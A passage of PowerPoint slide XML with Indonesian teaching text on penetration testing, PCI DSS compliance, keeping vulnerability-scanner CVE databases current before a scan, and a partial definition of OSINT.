              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensimulasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dunia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gambaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Temuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teridentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memainkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> rutin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Data Industri Kartu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pembayaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Security Standard (PCI DSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamanatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> uji </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kartu</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190</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="146974062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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>cek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> scan CVE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>vulnerability scanning software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>update signature/plug-in database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (daftar CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, exploit checks, dan detection rules).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Tools </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Nessus, OpenVAS, Qualys, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Nexpose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database CVE/plug-in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbarunya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diunduh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di advisory. Jadi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> scan CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>up to date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. Apa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> OSINT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>OSINT (Open Source Intelligence)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internet, media </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sosial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, forum, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>repositori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan database yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
